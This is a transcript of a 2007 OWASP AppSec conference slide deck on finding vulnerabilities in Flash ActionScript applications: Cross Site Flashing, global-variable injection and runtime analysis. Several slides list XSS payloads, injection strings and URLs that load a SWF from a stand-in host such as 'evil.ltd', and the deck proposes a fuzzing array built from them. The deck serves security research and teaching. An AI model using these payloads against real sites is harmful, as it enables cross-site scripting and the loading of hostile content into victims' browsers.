Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps

Finding Vulnerabilities in Flash Applications Stefano Di Paola CTO MindedSecurity [email_address] +393209495590

Stefano Di Paola:
CTO & Co-Founder Minded Security
Security Engineer & Researcher
Web App Pen Tester
Code Review and Forensic
Vulnerabilities (PDF UXSS & Others)
OWASP Italy R&D Director
$ Whoami^J

Agenda
Introduction
SWF Client Side Attacks
Finding Injection Entry Points
Potentially Dangerous Native Functions and Objects
Runtime Analysis

Objectives
Focus on Flash ActionScript 2 Applications Security
Understand the attack flow
Dead Code Analysis Methodology
Runtime Analysis Methodology

Flash Apps - Security Concerns
Can execute JavaScript when embedded in a HTML page and viewed from inside a Browser.
Can forge binary requests and HTTP Requests.
Can execute external Flash Movies.
Can play Audio/Video files natively.
Can display minimal HTML code inside a TextField.

Agenda
Introduction
Runtime Analysis

This new attack vector was presented @ OWASP 2007 Appsec Conference in Milan, Italy
Relies on flawed SWF files and not on SWF parser
A flawed SWF is a SWF which could allow
classical XSS
Cross Site Flashing (the dark side of cross movie scripting)

Cross Site Flashing (XSF)
XSF occurs when from different domains:
One Movie loads another Movie with loadMovie* functions or other hacks and has access to the same sandbox or part of it
XSF could also occurs when an HTML page uses *Script to script a Macromedia Flash movie, for example, by calling:
GetVariable : access to flash public and static object from javascript as a string.
SetVariable : set a static or public flash object to a new string value from javascript.
Unexpected Browser to SWF communication could result in stealing data from SWF application

Accomplishing an Attack using flawed SWF
When a link to a flawed SWF is directly pasted to the location bar every browser automatically generates some HTML with Object and/or Embed tags :
<html> <body marginwidth="0" marginheight="0"> <embed width="100%" height="100%" name="plugin" src="http://Url/To/Swf" type="application/x-shockwave-flash"/> </body> </html>

Attack Example to a Flawed SWF
A flawed SWF was uploaded to vi.ct.im Host.
Contains the following code
Let's see what an attacker could do with a browser ( Video )
v1.loadv = function () { this.varTarget = new MovieClip(); _root.createEmptyMovieClip('varTarget', 10); var v2 = new XML(); v2.load( _root.test ); };

Accomplish an attack
So clicking and redirecting to a SWF will let the browser execute it on the main window.
Works with every browser.
IE7 needs:
Iframe 'src' could be used too.
Tested on Firefox
SWF/Browser interaction doesn't work in IE7 using javascript: .
We'll see when it works even with IE7
try{ code }catch(e){location.reload()}

The Attack Flow We will see the dangerous mechanisms that could lead to Client Side Attacks
URL QueryString
Global Uninitialized Variables
flashVars
External Movies
Remote XML files
MP3 and Flv Movies
Embedded HTML

Agenda
Introduction
Runtime Analysis

Register Globals in ActionScript
Similar to PHP Register Globals
Every uninitialized variable with global scope is a potential threat:
_root.*
_global.*
_level0.*
.*
It is easy to add it as a parameter in the query string:
http://URL ?language=http://evil
if (_root.language != undefined) { Locale.DEFAULT_LANG = _root.language; } v5.load(Locale.DEFAULT_LANG + '/player_' + Locale.DEFAULT_LANG + '.xml');

Register Globals in Included Files 1/2
Assumptions made for _level n movies are wrong when a movie supposed to be at level1 is loaded as _level0
_level( n-1 ).*
/* Level0 Movie */ _level0.DEMO_PATH = getHost(this._url); loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'upperlev.swf', (_level0.demo_level + 1)); .... /* Level1 Movie ' upperlev.swf ' */ .... loadMovieNum( _level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......

Register Globals in Included Files 2/2
Then let's load upperlev.swf and then use query string to initialize DEMO_PATH:
http://host/upperlev.swf ?DEMO_PATH=http://evil
/* Level1 Movie ' upperlev.swf ' */ .... loadMovieNum( _level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......

Agenda
Introduction
Runtime Analysis
Static Analysis

Attack Patterns – Quick Reference
Some Attack patterns were already described in:
Testing Flash Applications
http://www.wisec.it/docs.php?id=5
A quick reference of attack patterns which trigger XSS in SWF:
asfunction :getURL,javascript:alert('XSS')
javascript:alert('XSS')
<img src='javascript:alert(“XSS”)//.jpg'>
http://evil.ltd/evilversion7.swf

Attack Patterns – Quick Reference
A quick reference of PDNF and Objects where attack pattern could be injected:
getURL
load*(URL,..) Functions
loadVariables(url, level )
LoadMovie ( url, target )
LoadMovieNum( url, level )
XML.load ( url )
LoadVars.load ( url )
Sound.loadSound( url , isStreaming );
NetStream.play( url );
TextField.htmlText

Attack Patterns – GetURL New Issue
The GET issue^N^N^N^N^Nfeature :
From Adobe :
“ ..The GET method appends the variables to the end of the URL, and is used for small numbers of variables..”
if a SWF contains the above, a request like
becomes:
Credits go to SirDarckCat and Kuza55 who found it
getURL('javascript:SomeFunc( “ someValue ” )','','GET')
http://victim/noundef.swf?a=0:0;alert('XSS')
javascript:SomeFunc(“someValue”) ?a=0:0;alert(123)

Attack Patterns – ExternalInterface New Issue
flash.external.ExternalInterface.call syntax
Actually, methodName could be any Javascript code. In fact, when call(' method123 ') is executed, a javascript function is called ( www.develotec.com/flash8api.txt ) :
public static call(methodName:String, [parameter1:Object])
try { __flash__toXML( method123 ()) ; } catch (e) { "<undefined/>"; }

External Interface Attack
What happens if a SWF contains:
http://host/swf?callback= (new Function(“alert(‘Xss’)”))
Works with Iframe and IE7 too
flash.external.ExternalInterface.call( _root.callback ) __flash__toXML( (new Function( “ alert( ‘ Xss ’ ) ” )) ())

Attack Patterns – Font New Issue
Some code like
Rewrites ‘something’ to
<p font=“TIMES”>something</p>
That could be exploited by injecting :
fontFamily = ' ”><img src=”http://evil/evil.swf”><” '
createTextField("txt", 999, 10, 10, 320, 240);
txt.html=true;
var _tf:TextFormat = new TextFormat();
_tf.font = _root.fontFamily ;
txt.setTextFormat( _tf );
txt.htmlText='something';

Modify the Data Flow 1/4
Multiple classes and packages are often used to separate functionality.
In Flash, every class/package like
is compiled in the following way:
push 'simpleClass'
getVariable
not
not
branchIfTrue label1
...
label1
end
class simpleClass{}

Decompiled by flare, results in:
So simpleClass is a _global attribute.
This means that it's initially undefined.
So it can be instantiated with a string value from the query string
if (!simpleClass) {
_global.simpleClass = function () {}; ... }

Suppose there is a class like:
class simpleUtils {
static public function testForSomething(){
if(ok) return true;
else return false;
} ...
class simpleClass {
static function main(){
if(!simpleUtils.testForSomething()) getURL('javascript:alert("Sorry!")');
else getURL('javascript:alert("ok!")');
} ...

Sending the request:
http://host/swf.swf? simpleUtils =blah
sets the object simpleUtils to an instantiated string, so:
simpleUtils.testForSomething()
becomes undefined and the flow is modified.
if(!simpleUtils.testForSomething())
getURL('javascript:alert("Sorry!")');
else
getURL('javascript:alert("ok!")');

Agenda
Introduction
Runtime Analysis

Recipe for Runtime Analysis
A method to find uninitialized variables
A SWF Container which loads the external one
One array of attack patterns
A framework to mix our ingredients

Find Undefined Vars @ Runtime
Definition of __resolve :
from Adobe:
“ a reference to a user-defined function that is invoked if ActionScript code refers to an undefined property or method . If ActionScript code refers to an undefined property or method of an object, Flash Player determines whether the object's __resolve property is defined.”
As we need to find _root.* or _global.* undefined variables:
_ root.__resolve = function (name){ // name is undefined }

Attack Patterns Array
From our knowledge base, an attack Array will contain the following elements:
Direct load asfunction:
getURL,javascript:gotRoot("")///d.jpg
Controlled Evil Page/Host:
http://at.tack.er/evil.swf
Flash Html Injection:
“ '><img src='asfunction:getURL,javascript:gotRoot(“”)//.jpg' >
Dom Injection:
(gotRoot(''))
Js/Flash Error:
“ '|!$%&/)=

A SWF Container
The SWF to be analyzed is closed, so we need a wrapper which shares _root and _global variables
The wrapper will contain __resolve methods for _root and _globals.
var image_mcl = new MovieClipLoader();
image_mcl.addListener(mclListener);
_root._lockroot=true
image_mcl.loadClip( _root.swfurl+"?"+ _root.varToSend, _root.varTarget);

A framework: SWFRTAnalyzer

Conclusions
A free version of the SWF Runtime Analyser will be released by Minded Security.
Awareness about ActionScript security is growing but is still a drop in the ocean.
There is still a lot of research to do about Actionscript security.

Thank you :) Questions?
Web: http://www.mindedsecurity.com
Weblog: http://www.wisec.it
Email: stefano.dipaola_at_mindedsecurity.com

http://fuzzing.ru	87
http://static.slideshare.net	5
http://www.health.medicbd.com	1

Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps

by guestb0af15 on Dec 19, 2007

Accessibility

Categories

Tags

Upload Details

Usage Rights

3 Embeds 93

Statistics

Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps — Presentation Transcript